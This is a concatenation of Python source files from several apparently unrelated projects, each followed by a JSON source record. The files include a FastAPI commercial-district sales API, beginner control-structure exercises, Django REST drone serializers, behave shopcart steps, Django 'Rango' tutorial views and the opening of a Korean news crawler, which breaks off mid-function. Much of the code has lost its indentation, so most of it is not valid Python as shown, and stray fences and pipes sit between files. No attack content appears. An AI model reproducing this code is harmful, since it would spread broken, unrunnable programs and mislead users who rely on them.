#### File: api/routers/detail_ro.py
```python
from typing import List, Optional
from fastapi import APIRouter, Depends, HTTPException, status
from sqlalchemy.orm import Session
import math
from api import database
from api import models
from api.schemas import detail_sc, area_sc
router = APIRouter(
prefix="/detail",
tags=["Detail"],
responses={404: {"description": "Not found"}},
)
get_db = database.get_db
@router.get("/", response_model=detail_sc.DetailSchema)
def getDetail(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
    `Done`\n
    `area` : information on the selected commercial district\n
    `areaCode` : district code\n
    `areaName` : district name\n
    `businessList` : store information\n
    `businessCode` : business-type code\n
    `businessName` : business-type name\n
    `businessCount` : number of stores of that business type in the district\n
    -> if businessCode1~3 are None : the top-3 most common business types in the district\n
    -> if businessCode1~3 are given : counts for the selected business types in the district
"""
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
if not area:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="해당 상권을 찾을 수 없습니다."
)
result = []
storeList = db.query(models.Store).filter(models.Store.areaCode == areaCode)
if not (businessCode1 or businessCode2 or businessCode3):
        # pick the top-3 business types
storeDict: dict = {}
for store in storeList.all():
if store.businessCode in storeDict.keys():
storeDict[store.businessCode] += 1
else:
storeDict[store.businessCode] = 1
for bestKey in sorted(storeDict, key=storeDict.get, reverse=True)[:3]:
result.append(
detail_sc.DetailBusiness(
businessCode = bestKey,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == bestKey).first().businessName,
businessCount = storeDict[bestKey]
)
)
else:
        # count the stores for each selected business type
for businessCode in (businessCode1, businessCode2, businessCode3):
if businessCode:
result.append(
detail_sc.DetailBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessCount = storeList.filter(models.Store.businessCode == businessCode).count()
)
)
return detail_sc.DetailSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
businessList = result
)
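# Usage sketch (editor's note, not in the original source): this route is typically called
# as GET /detail/?areaCode=<code> for the district's top-3 business types, or with the
# optional businessCode1..3 query parameters to count only the selected types.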
@router.get("/sales", response_model=detail_sc.SalesSchema)
def getSales(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
    `Done`\n
    `area` : information on the selected commercial district\n
    `sales` : minimum, maximum and average sales for the district\n
    `day` : average sales ratio by day of week for the district\n
    `time` : average sales ratio by time slot for the district\n
    _**(deprecated)** `businessList` : information on the selected business types_\n
    _**(deprecated)** `businessSale` : sales amount of the business type_\n
    _**(deprecated)** `businessDay` : sales ratio by day of week for the business type_\n
    _**(deprecated)** `businessTime` : sales ratio by time slot for the business type_\n
    -> if businessCode1~3 are None : []\n
    -> if businessCode1~3 are given : a business type is not added if the district has no data for it.
"""
    # commercial district
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
if not area:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="해당 상권을 찾을 수 없습니다."
)
    # minimum, maximum and average sales
sales = db.query(models.Sales).filter(models.Sales.areaCode == areaCode)
amountList = [sale.amount for sale in sales.all()]
resultSales = detail_sc.Sales(
min = min(amountList),
max = max(amountList),
avg = sum(amountList) / len(amountList),
)
    # sales by day of week
salesIdList = [sale.id for sale in sales.all()]
salesIdListCount = len(salesIdList)
daySales = db.query(models.DaySales).filter(models.DaySales.salesId.in_(salesIdList)).all()
resultDaySales = detail_sc.Day()
for sale in daySales:
resultDaySales.mon += sale.mondayRatio
resultDaySales.tue += sale.tuesdayRatio
resultDaySales.wed += sale.wednesdayRatio
resultDaySales.thu += sale.thursdayRatio
resultDaySales.fri += sale.fridayRatio
resultDaySales.sat += sale.saturdayRatio
resultDaySales.sun += sale.sundayRatio
resultDaySales.mon = round(resultDaySales.mon / salesIdListCount)
resultDaySales.tue = round(resultDaySales.tue / salesIdListCount)
resultDaySales.wed = round(resultDaySales.wed / salesIdListCount)
resultDaySales.thu = round(resultDaySales.thu / salesIdListCount)
resultDaySales.fri = round(resultDaySales.fri / salesIdListCount)
resultDaySales.sat = round(resultDaySales.sat / salesIdListCount)
resultDaySales.sun = round(resultDaySales.sun / salesIdListCount)
    # sales by time slot
timeSales = db.query(models.TimeSales).filter(models.TimeSales.salesId.in_(salesIdList)).all()
resultTimeSales = detail_sc.Time()
for sale in timeSales:
resultTimeSales.time0006 += sale.time0006
resultTimeSales.time0611 += sale.time0611
resultTimeSales.time1114 += sale.time1114
resultTimeSales.time1417 += sale.time1417
resultTimeSales.time1721 += sale.time1721
resultTimeSales.time2124 += sale.time2124
resultTimeSales.time0006 = round(resultTimeSales.time0006 / salesIdListCount)
resultTimeSales.time0611 = round(resultTimeSales.time0611 / salesIdListCount)
resultTimeSales.time1114 = round(resultTimeSales.time1114 / salesIdListCount)
resultTimeSales.time1417 = round(resultTimeSales.time1417 / salesIdListCount)
resultTimeSales.time1721 = round(resultTimeSales.time1721 / salesIdListCount)
resultTimeSales.time2124 = round(resultTimeSales.time2124 / salesIdListCount)
    # for the selected business types
resultBusinessList: list[detail_sc.SalesBusiness] = []
if businessCode1 or businessCode2 or businessCode3:
for businessCode in (businessCode1, businessCode2, businessCode3):
if businessCode:
targetSales = sales.filter(models.Sales.businessCode == businessCode).first()
if not targetSales:
continue
targetDay = db.query(models.DaySales).filter(models.DaySales.id == targetSales.id).first()
targetTime = db.query(models.TimeSales).filter(models.TimeSales.salesId == targetSales.id).first()
resultBusinessList.append(
detail_sc.SalesBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessSale = targetSales.amount,
businessDay = detail_sc.Day(
mon = targetDay.mondayRatio,
tue = targetDay.tuesdayRatio,
wed = targetDay.wednesdayRatio,
thu = targetDay.thursdayRatio,
fri = targetDay.fridayRatio,
sat = targetDay.saturdayRatio,
sun = targetDay.sundayRatio,
),
businessTime = detail_sc.Time(
time0006 = targetTime.time0006,
time0611 = targetTime.time0611,
time1114 = targetTime.time1114,
time1417 = targetTime.time1417,
time1721 = targetTime.time1721,
time2124 = targetTime.time2124,
)
)
)
        # overall ratios across the collected business types
listLength = len(resultBusinessList)
resultSales = detail_sc.Sales(
min = min(map(lambda x:x.businessSale, resultBusinessList)),
max = max(map(lambda x:x.businessSale, resultBusinessList)),
avg = round(sum(map(lambda x:x.businessSale, resultBusinessList)) / listLength)
)
resultDaySales = detail_sc.Day(
mon = round(sum(map(lambda x: x.businessDay.mon, resultBusinessList)) / listLength),
tue = round(sum(map(lambda x: x.businessDay.tue, resultBusinessList)) / listLength),
wed = round(sum(map(lambda x: x.businessDay.wed, resultBusinessList)) / listLength),
thu = round(sum(map(lambda x: x.businessDay.thu, resultBusinessList)) / listLength),
fri = round(sum(map(lambda x: x.businessDay.fri, resultBusinessList)) / listLength),
sat = round(sum(map(lambda x: x.businessDay.sat, resultBusinessList)) / listLength),
sun = round(sum(map(lambda x: x.businessDay.sun, resultBusinessList)) / listLength),
)
resultTimeSales = detail_sc.Time(
time0006 = round(sum(map(lambda x: x.businessTime.time0006, resultBusinessList)) / listLength),
time0611 = round(sum(map(lambda x: x.businessTime.time0611, resultBusinessList)) / listLength),
time1114 = round(sum(map(lambda x: x.businessTime.time1114, resultBusinessList)) / listLength),
time1417 = round(sum(map(lambda x: x.businessTime.time1417, resultBusinessList)) / listLength),
time1721 = round(sum(map(lambda x: x.businessTime.time1721, resultBusinessList)) / listLength),
time2124 = round(sum(map(lambda x: x.businessTime.time2124, resultBusinessList)) / listLength),
)
return detail_sc.SalesSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
sales = resultSales,
day = resultDaySales,
time = resultTimeSales,
# businessList = resultBusinessList
)
@router.get("/customer", response_model=detail_sc.CustomerSchema)
def getCustomer(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
    `Done`\n
    `area` : information on the selected commercial district\n
    `genderRatio` : sales ratio by gender for the selected district\n
    `ageRatio` : sales by age group for the selected district\n
    _**(deprecated)** `businessList` : information on the selected business types_\n
"""
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
resultCustomerList: list[detail_sc.CustomerBusiness] = []
sales = db.query(models.Sales).filter(models.Sales.areaCode == areaCode)
salesIdList = []
for sale in sales:
salesIdList.append(sale.id)
customers = db.query(models.CustomerSales).filter(models.CustomerSales.salesId.in_(salesIdList))
    # when no business type is selected
    # compute the male/female ratio
man_sum = woman_sum = 0
for customer in customers:
man_sum += customer.man
woman_sum += customer.woman
man_ratio = round(man_sum/len(salesIdList) * (100/((man_sum/len(salesIdList)) + woman_sum/len(salesIdList))))
woman_ratio = round(woman_sum/len(salesIdList) * (100/((man_sum/len(salesIdList)) + woman_sum/len(salesIdList))))
    # compute the ratio by age group
age_sum_list = []
age10_sum = age20_sum = age30_sum = age40_sum = age50_sum = age60_sum = 0
for customer in customers:
age10_sum += customer.age10
age20_sum += customer.age20
age30_sum += customer.age30
age40_sum += customer.age40
age50_sum += customer.age50
age60_sum += customer.age60
age_sum_list.extend([age10_sum, age20_sum, age30_sum, age40_sum, age50_sum, age60_sum])
age_ratio = []
for age in age_sum_list:
ratio = (age/len(salesIdList)) * (100/(sum(age_sum_list)/len(salesIdList)))
age_ratio.append(round(ratio))
age10_ratio = age_ratio[0]
age20_ratio = age_ratio[1]
age30_ratio = age_ratio[2]
age40_ratio = age_ratio[3]
age50_ratio = age_ratio[4]
age60_ratio = age_ratio[5]
    # when business types are selected
if businessCode1 or businessCode2 or businessCode3:
for businessCode in (businessCode1, businessCode2, businessCode3):
if not businessCode:
continue
try:
targetSales = sales.filter(models.Sales.businessCode == businessCode).first()
targetCustomer = db.query(models.CustomerSales).filter(models.CustomerSales.id == targetSales.id).first()
                # gender ratio for the business type
man_ratio1 = targetCustomer.man * (100/(targetCustomer.man + targetCustomer.woman))
woman_ratio1 = targetCustomer.woman * (100/(targetCustomer.man + targetCustomer.woman))
                # age-group ratio for the business type
age_sum = targetCustomer.age10 + targetCustomer.age20 + targetCustomer.age30 + targetCustomer.age40 + targetCustomer.age50 + targetCustomer.age60
age10_ratio1 = targetCustomer.age10 * (100/age_sum)
age20_ratio1 = targetCustomer.age20 * (100/age_sum)
age30_ratio1 = targetCustomer.age30 * (100/age_sum)
age40_ratio1 = targetCustomer.age40 * (100/age_sum)
age50_ratio1 = targetCustomer.age50 * (100/age_sum)
age60_ratio1 = targetCustomer.age60 * (100/age_sum)
resultCustomerList.append(
detail_sc.CustomerBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessGender = detail_sc.CustomerGenderRatio(
male = round(man_ratio1),
female = round(woman_ratio1)
),
businessAge = detail_sc.CustomerAgeRatio(
age10 = round(age10_ratio1),
age20 = round(age20_ratio1),
age30 = round(age30_ratio1),
age40 = round(age40_ratio1),
age50 = round(age50_ratio1),
age60 = round(age60_ratio1)
)
)
)
except:
continue
        # overall ratios across the collected business types
listLength = len(resultCustomerList)
man_ratio = sum(map(lambda x: x.businessGender.male, resultCustomerList)) / listLength
woman_ratio = sum(map(lambda x: x.businessGender.female, resultCustomerList)) / listLength
age10_ratio = sum(map(lambda x: x.businessAge.age10, resultCustomerList)) / listLength
age20_ratio = sum(map(lambda x: x.businessAge.age20, resultCustomerList)) / listLength
age30_ratio = sum(map(lambda x: x.businessAge.age30, resultCustomerList)) / listLength
age40_ratio = sum(map(lambda x: x.businessAge.age40, resultCustomerList)) / listLength
age50_ratio = sum(map(lambda x: x.businessAge.age50, resultCustomerList)) / listLength
age60_ratio = sum(map(lambda x: x.businessAge.age60, resultCustomerList)) / listLength
return detail_sc.CustomerSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
genderRatio = detail_sc.CustomerGenderRatio(
male = man_ratio,
female = woman_ratio
),
ageRatio = detail_sc.CustomerAgeRatio(
age10 = age10_ratio,
age20 = age20_ratio,
age30 = age30_ratio,
age40 = age40_ratio,
age50 = age50_ratio,
age60 = age60_ratio
),
# business = resultCustomerList
)
@router.get("/future", response_model=detail_sc.FutureSchema)
def getFuture(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
    `Done`\n
    `area` : information on the selected commercial district\n
    `areaSituation` : outlook for the selected district **(정체/stagnant, 상권축소/shrinking, 상권확장/expanding, 다이나믹/dynamic)**\n
    `areaClosure` : closure rate of the selected district\n
    _**(deprecated)** `business` : information on the selected business types_\n
"""
situationStr = { 1: "정체", 2: "상권축소", 3: "상권확장", 4: "다이나믹" }
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
resultFutureList: list[detail_sc.FutureBusiness] = []
    # when no business type is selected
    # sum of the closure rates of all stores in the district / number of stores
change_sum = change_cnt = 0
changeList = db.query(models.Change).filter(models.Change.areaCode == areaCode)
for change in changeList:
change_sum += change.closure
change_cnt += 1
area_closure = int(change_sum / change_cnt)
    # when business types are selected
if businessCode1 or businessCode2 or businessCode3:
for businessCode in (businessCode1, businessCode2, businessCode3):
if not businessCode:
continue
targetClosure = db.query(models.Change).filter(models.Change.areaCode == areaCode) \
.filter(models.Change.businessCode == businessCode).first()
try:
resultFutureList.append(
detail_sc.FutureBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessClosure = targetClosure.closure
)
)
except:
continue
        # overall ratio across the collected business types
area_closure = sum(map(lambda x: x.businessClosure, resultFutureList)) / len(resultFutureList)
return detail_sc.FutureSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
areaSituation = situationStr[area.status],
areaClosure = area_closure,
# business = resultFutureList
)
``` |
{
"source": "2022AC12SDD/Aurora_SDD_Template",
"score": 3
} |
#### File: 2022AC12SDD/Aurora_SDD_Template/test_helpers.py
```python
import pytest
import helpers as h
def test_ultimate_answer():
question1 = 'What is the meaning of Life, The Universe, Everything?'
assert h.ultimate_answer(question1) == '42'
question2 = 'What is 6 x 7'
assert h.ultimate_answer(question2) == 'That is not much of a question'
``` |
{
"source": "2022AC12SDD/control-structures-dvorakman",
"score": 4
} |
#### File: 2022AC12SDD/control-structures-dvorakman/helpers.py
```python
def ultimate_answer(question):
"""Provides an answer to the ultimate question.
Returns '42' if the question is 'What is the meaning of Life, The Universe,
Everything?' otherwise returns 'That is not much of a question'
args:
question (str): The question to be answered.
returns:
str
"""
if question == "What is the meaning of Life, The Universe, Everything?":
answer = "42"
else:
answer = "That is not much of a question"
return answer
## binary selection ##
def check_guess_bin(guess, target):
"""Checks a guess to see if it is the same as the target.
Complete this function using binary selection
Args:
guess: int - the guessed number
target: int - the correct or target number
Returns:
winner: bool - True if correct guess otherwise false
"""
if guess == target:
return True
else:
return False
## multiway selection
def check_guess_multi(guess, target):
"""Checks a guess to see if it is the same as the target.
If the guess is incorrect, prompts the player to guess higher
or lower as appropriate.
Complete this function using multi-way selection
Args:
guess: int - the guessed number
target: int - the correct or target number
Returns:
prompt: str - "higher", "lower" or "correct"
"""
    if guess > target:
        prompt = "lower"
    elif guess < target:
        prompt = "higher"
    else:
        prompt = "correct"
    return prompt
## pre-test repetition
def factorial(num):
"""Calculates the factorial of a number.
Use pre-test repetition to write a function that computes the factorial of a number.
A factorial of a number is the product of all the positive integers
    less than or equal to it.
For example 4 factorial is 4 x 3 x 2 x 1 = 24
Args:
num: int - the number for which to calculate the factorial
Returns:
fact: the factorial of num
"""
    iteration = 1
    fact = 1
    while iteration <= num:
        fact = fact * iteration
        iteration = iteration + 1
    return fact
## counted repetition
def add_array(in_array):
"""Adds the elements of an array.
Use counted repetition, using a start, finish and a step, to sum the
elements of an array
Args:
in_array: array if numbers to be added
Returns:
sum: the sum of the array
"""
sum = 0
for i in range(0, len(in_array)):
sum = sum + in_array[i]
return sum
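# Quick usage sketch added by the editor (not part of the original exercise):
# factorial(4) == 24 and add_array([1, 2, 3]) == 6.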
``` |
{
"source": "2022-capstone-design-KPUCS/capstone-drone-backend",
"score": 2
} |
#### File: drone-wrapper/stats/serializers.py
```python
from rest_framework import serializers
from .models import Flight, Deck, Drone, FlightRecord
class DeckSerializer(serializers.ModelSerializer):
def create(self, validated_data):
return Deck.objects.create(**validated_data)
class Meta:
model = Deck
fields = '__all__'
class FlightRecordSerializer(serializers.ModelSerializer):
def create(self, validated_data):
return FlightRecord.objects.create(**validated_data)
class Meta:
model = FlightRecord
fields = '__all__'
class FlightSerializer(serializers.ModelSerializer):
def create(self, validated_data):
flight = Flight.objects.create(**validated_data)
Drone.objects.update(flight=flight.id)
return flight
class Meta:
model = Flight
fields = '__all__'
class DroneSerializer(serializers.ModelSerializer):
class Meta:
model = Drone
fields = '__all__'
def create(self, validated_data):
drone_alias = validated_data['drone_alias'].lower()
deck_name = "".join([drone_alias, '-deck'])
Deck.objects.create(deck_name=deck_name, is_occupied=False)
validated_data['deck'] = Deck.objects.get(deck_name=deck_name)
validated_data['admin'] = self.context['request'].user
drone = Drone.objects.create(**validated_data)
return drone
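    # Editor's note (inferred from create() above, not in the original source): registering
    # a drone with drone_alias "Alpha" also creates a Deck named "alpha-deck", links it to
    # the drone, and records the requesting user as the drone's admin.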
``` |
{
"source": "2022-Spring-NYU-DevOps-Shopcarts/shopcarts",
"score": 3
} |
#### File: features/steps/shopcarts_steps.py
```python
import json
import requests
from behave import given
from compare import expect
@given('a set of items in shopcarts')
def step_impl(context):
""" Delete all Shopcarts and load new ones """
headers = {'Content-Type': 'application/json'}
# list all of the shopcarts and delete them one by one
context.resp = requests.get(context.base_url + '/shopcarts')
expect(context.resp.status_code).to_equal(200)
for shopcart in context.resp.json():
context.resp = requests.delete(context.base_url + '/shopcarts/' + str(shopcart["user_id"]), headers=headers)
expect(context.resp.status_code).to_equal(204)
# load the database with new shopcarts
create_url = context.base_url + '/shopcarts'
for row in context.table:
data = {
"item_id": int(row['item_id']),
"item_name": row['item_name'],
"quantity": int(row['quantity']),
"price": float(row['price']),
"hold": bool(row['hold'] in ['True', 'true', '1'])
}
payload = json.dumps(data)
context.resp = requests.post(create_url+"/"+row['user_id']+"/items", data=payload, headers=headers)
expect(context.resp.status_code).to_equal(201)
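# Editor's sketch of the Gherkin table this step expects (column names inferred from the
# row[...] lookups above; the values are made up for illustration):
#
#   Given a set of items in shopcarts
#       | user_id | item_id | item_name | quantity | price | hold  |
#       | 101     | 1       | ring      | 2        | 9.99  | False |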
``` |
{
"source": "2027205T/tangowithdjango",
"score": 2
} |
#### File: tango_with_django_project/rango/views.py
```python
from django.shortcuts import render
from rango.models import Category
from rango.models import Page
from rango.models import User, UserProfile
from rango.forms import CategoryForm
from rango.forms import PageForm
from rango.forms import UserForm, UserProfileForm
from django.contrib.auth import authenticate, login
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from datetime import datetime
from rango.bing_search import run_query
from django.shortcuts import redirect
@login_required
def restricted(request):
# Take the user back to the homepage.
return HttpResponseRedirect('/rango/restricted.html')
def manageCookies(request, context_dict):
visits = request.session.get('visits')
if not visits:
visits = 1
reset_last_visit_time = False
last_visit = request.session.get('last_visit')
if last_visit:
last_visit_time = datetime.strptime(last_visit[:-7], "%Y-%m-%d %H:%M:%S")
if (datetime.now() - last_visit_time).seconds > 0:
# ...reassign the value of the cookie to +1 of what it was before...
visits = visits + 1
# ...and update the last visit cookie, too.
reset_last_visit_time = True
else:
# Cookie last_visit doesn't exist, so create it to the current date/time.
reset_last_visit_time = True
if reset_last_visit_time:
request.session['last_visit'] = str(datetime.now())
request.session['visits'] = visits
context_dict['visits'] = visits
return context_dict
def index(request):
category_list = Category.objects.order_by('-likes')[:5]
page_list = Page.objects.order_by('-views')[:5]
context_dict = {'categories': category_list, 'pages': page_list}
context_dict = manageCookies(request, context_dict)
response = render(request,'rango/index.html', context_dict)
return response
def about(request):
# Construct a dictionary to pass to the template engine as its context.
# Note the key boldmessage is the same as {{ boldmessage }} in the template!
context_dict = {'boldmessage': "sorry :)"}
    # If the visits session variable exists, take it and use it.
# If it doesn't, we haven't visited the site so set the count to zero.
if request.session.get('visits'):
context_dict['visits'] = request.session.get('visits')
else:
context_dict['visits'] = 0
# Return a rendered response to send to the client.
# We make use of the shortcut function to make our lives easier.
# Note that the first parameter is the template we wish to use.
return render(request, 'rango/about/index.html', context_dict)
def category(request, category_name_slug):
context_dict = {}
context_dict['result_list'] = None
context_dict['query'] = None
if request.method == 'POST':
query = request.POST.get('query', '').strip()
if query:
# Run our Bing function to get the results list!
result_list = run_query(query)
context_dict['result_list'] = result_list
context_dict['query'] = query
try:
category = Category.objects.get(slug=category_name_slug)
context_dict['category_name'] = category.name
pages = Page.objects.filter(category=category).order_by('-views')
context_dict['pages'] = pages
context_dict['category'] = category
except Category.DoesNotExist:
pass
if not context_dict['query']:
context_dict['query'] = category.name
return render(request, 'rango/category.html', context_dict)
@login_required
def add_category(request):
# A HTTP POST?
if request.method == 'POST':
form = CategoryForm(request.POST)
# Have we been provided with a valid form?
if form.is_valid():
# Save the new category to the database.
form.save(commit=True)
# Now call the index() view.
# The user will be shown the homepage.
return index(request)
else:
# The supplied form contained errors - just print them to the terminal.
            print(form.errors)
else:
# If the request was not a POST, display the form to enter details.
form = CategoryForm()
# Bad form (or form details), no form supplied...
# Render the form with error messages (if any).
return render(request, 'rango/add_category.html', {'form': form})
@login_required
def add_page(request, category_name_slug):
try:
cat = Category.objects.get(slug=category_name_slug)
except Category.DoesNotExist:
cat = None
if request.method == 'POST':
form = PageForm(request.POST)
if form.is_valid():
if cat:
page = form.save(commit=False)
page.category = cat
page.views = 0
page.save()
# probably better to use a redirect here.
return category(request, category_name_slug)
else:
            print(form.errors)
else:
form = PageForm()
context_dict = {'form':form, 'category': cat}
return render(request, 'rango/add_page.html', context_dict)
'''
def register(request):
# A boolean value for telling the template whether the registration was successful.
# Set to False initially. Code changes value to True when registration succeeds.
registered = False
# If it's a HTTP POST, we're interested in processing form data.
if request.method == 'POST':
# Attempt to grab information from the raw form information.
# Note that we make use of both UserForm and UserProfileForm.
user_form = UserForm(data=request.POST)
profile_form = UserProfileForm(data=request.POST)
# If the two forms are valid...
if user_form.is_valid() and profile_form.is_valid():
# Save the user's form data to the database.
user = user_form.save()
# Now we hash the password with the set_password method.
# Once hashed, we can update the user object.
user.set_password(user.password)
user.save()
# Now sort out the UserProfile instance.
# Since we need to set the user attribute ourselves, we set commit=False.
# This delays saving the model until we're ready to avoid integrity problems.
profile = profile_form.save(commit=False)
profile.user = user
# Did the user provide a profile picture?
# If so, we need to get it from the input form and put it in the UserProfile model.
if 'picture' in request.FILES:
profile.picture = request.FILES['picture']
# Now we save the UserProfile model instance.
profile.save()
# Update our variable to tell the template registration was successful.
registered = True
# Invalid form or forms - mistakes or something else?
# Print problems to the terminal.
# They'll also be shown to the user.
else:
print user_form.errors, profile_form.errors
# Not a HTTP POST, so we render our form using two ModelForm instances.
# These forms will be blank, ready for user input.
else:
user_form = UserForm()
profile_form = UserProfileForm()
# Render the template depending on the context.
return render(request,
'rango/register.html',
{'user_form': user_form, 'profile_form': profile_form, 'registered': registered} )
def user_login(request):
# If the request is a HTTP POST, try to pull out the relevant information.
if request.method == 'POST':
# Gather the username and password provided by the user.
# This information is obtained from the login form.
username = request.POST['username']
password = request.POST['password']
# Use Django's machinery to attempt to see if the username/password
# combination is valid - a User object is returned if it is.
user = authenticate(username=username, password=password)
# If we have a User object, the details are correct.
# If None (Python's way of representing the absence of a value), no user
# with matching credentials was found.
if user:
# Is the account active? It could have been disabled.
if user.is_active:
# If the account is valid and active, we can log the user in.
# We'll send the user back to the homepage.
login(request, user)
return HttpResponseRedirect('/rango/')
else:
# An inactive account was used - no logging in!
return HttpResponse("Your Rango account is disabled.")
else:
# Bad login details were provided. So we can't log the user in.
print "Invalid login details: {0}, {1}".format(username, password)
return HttpResponse("Hey <strong>{0}</strong>, your login details are invalid.<ul><li><a href='../../rango/login/'>Please try again</a>.</li></ul>".format(username))
# The request is not a HTTP POST, so display the login form.
# This scenario would most likely be a HTTP GET.
else:
# No context variables to pass to the template system, hence the
# blank dictionary object...
return render(request, 'rango/login.html', {})
# Use the login_required() decorator to ensure only those logged in can access the view.
@login_required
def user_logout(request):
# Since we know the user is logged in, we can now just log them out.
logout(request)
# Take the user back to the homepage.
return HttpResponseRedirect('/rango/')
'''
def restricted(request):
# Construct a dictionary to pass to the template engine as its context.
# Note the key boldmessage is the same as {{ boldmessage }} in the template!
context_dict = {'boldmessage': "Oops :)"}
# Return a rendered response to send to the client.
# We make use of the shortcut function to make our lives easier.
# Note that the first parameter is the template we wish to use.
return render(request, 'rango/restricted.html', context_dict)
def search(request):
result_list = []
if request.method == 'POST':
query = request.POST['query'].strip()
if query:
# Run our Bing function to get the results list!
result_list = run_query(query)
return render(request, 'rango/search.html', {'result_list': result_list})
def track_url(request):
page_id = None
url = '/rango/'
if request.method == 'GET':
if 'page_id' in request.GET:
page_id = request.GET['page_id']
try:
page = Page.objects.get(id=page_id)
page.views = page.views + 1
page.save()
url = page.url
except:
pass
return redirect(url)
@login_required
def register_profile(request):
if request.method == 'POST':
profile_form = UserProfileForm(data=request.POST)
if profile_form.is_valid():
profile = profile_form.save(commit=False)
profile.user = User.objects.get(id=request.user.id)
if 'picture' in request.FILES:
try:
profile.picture = request.FILES['picture']
except:
pass
profile.save()
return redirect('index')
else:
profile_form = UserProfileForm()
return render(request, 'registration/profile_registration.html', {'profile_form': profile_form})
@login_required
def profile(request, user_id = None):
if user_id is not None:
context_dict = {'user': User.objects.get(id=user_id)}
else:
context_dict = {'user': User.objects.get(id=request.user.id)}
try:
context_dict['profile'] = UserProfile.objects.get(user=context_dict['user'])
except:
context_dict['profile'] = None
context_dict['myprofile'] = user_id is None or user_id == request.user.id
return render(request, 'registration/profile.html', context_dict)
@login_required
def edit_profile(request):
try:
users_profile = UserProfile.objects.get(user=request.user)
except:
users_profile = None
if request.method == 'POST':
profile_form = UserProfileForm(data=request.POST, instance=users_profile)
if profile_form.is_valid():
profile_updated = profile_form.save(commit=False)
if users_profile is None:
profile_updated.user = User.objects.get(id=request.user.id)
if 'picture' in request.FILES:
try:
profile_updated.picture = request.FILES['picture']
except:
pass
profile_updated.save()
return redirect('profile')
else:
form = UserProfileForm(instance=users_profile)
return render(request, 'registration/profile_edit.html', {'profile_form': form})
@login_required
def user_list(request):
users = User.objects.all()
return render(request, 'registration/user_list.html', {'users': users})
def bad_url(request):
return render(request, 'rango/nopage.html')
``` |
{
"source": "20-2-SKKU-OSS/2020-2-OSS-6-Project",
"score": 3
} |
#### File: 2020-2-OSS-6-Project/korea_news_crawler/articlecrawler.py
```python
from time import sleep
from bs4 import BeautifulSoup
from multiprocessing import Process
from korea_news_crawler.exceptions import *
from korea_news_crawler.articleparser import ArticleParser
from korea_news_crawler.writer import Writer
import os
import platform
import calendar
import requests
import re
from newspaper import Article
class ArticleCrawler(object):
def __init__(self):
choosen_categories = self.get_catergory()
self.categories = {'정치': 100, '경제': 101, '사회': 102, '생활문화': 103, '세계': 104, 'IT과학': 105, '오피니언': 110,
'politics': 100, 'economy': 101, 'society': 102, 'living_culture': 103, 'world': 104, 'IT_science': 105, 'opinion': 110}
self.selected_categories = []
self.date = {'start_year': 0, 'start_month': 0, 'end_year': 0, 'end_month': 0}
self.get_date()
self.set_date_range(self.date['start_year'],self.date['start_month'],self.date['end_year'],self.date['end_month'])
self.user_operating_system = str(platform.system())
self.set_category(choosen_categories)
self.keyword = self.get_keyword()
def get_catergory(self):
print("카테고리 : 정치 , 경제 , 사회 , 생활문화 , 세계 , IT과학 , 오피니언, 연합뉴스속보")
print("원하는 카테고리를 입력 하세요(공백으로 구분) : ",end ='')
choosen_categories = input()
choosen_list = choosen_categories.split(' ')
print(choosen_list)
return choosen_list
def get_date(self):
print("크롤링을 원하는 날짜 기간을 입력하세요 ")
for keys in self.date.keys() :
print(keys + " : ",end= '')
get_date = int(input())
self.date[keys] = get_date
##########################################################
def get_keyword(self):
keyword = 'initvalue'
ynkeyword = input("기사 제목 키워드 찾기 기능을 사용하시겠습니까? (y/n) :")
if ynkeyword == "n" or ynkeyword == "N":
return keyword
elif ynkeyword == "y" or ynkeyword == "Y":
keyword = input("원하는 키워드를 입력해주세요 :")
return keyword
else:
print("invalid input")
return keyword
##########################################################
def set_category(self, args):
for key in args:
if self.categories.get(key) is None and key != '연합뉴스속보':
raise InvalidCategory(key)
self.selected_categories = args
def set_date_range(self, start_year, start_month, end_year, end_month):
args = [start_year, start_month, end_year, end_month]
if start_year > end_year:
raise InvalidYear(start_year, end_year)
if start_month < 1 or start_month > 12:
raise InvalidMonth(start_month)
if end_month < 1 or end_month > 12:
raise InvalidMonth(end_month)
if start_year == end_year and start_month > end_month:
raise OverbalanceMonth(start_month, end_month)
for key, date in zip(self.date, args):
self.date[key] = date
print(self.date)
@staticmethod
def make_news_page_url(category_url, start_year, end_year, start_month, end_month):
made_urls = []
for year in range(start_year, end_year + 1):
print(year)
if start_year == end_year:
year_startmonth = start_month
year_endmonth = end_month
else:
if year == start_year:
year_startmonth = start_month
year_endmonth = 12
elif year == end_year:
year_startmonth = 1
year_endmonth = end_month
else:
year_startmonth = 1
year_endmonth = 12
for month in range(year_startmonth, year_endmonth + 1):
for month_day in range(1, calendar.monthrange(year, month)[1] + 1):
if len(str(month)) == 1:
month = "0" + str(month)
if len(str(month_day)) == 1:
month_day = "0" + str(month_day)
                    # build the page URL for each date
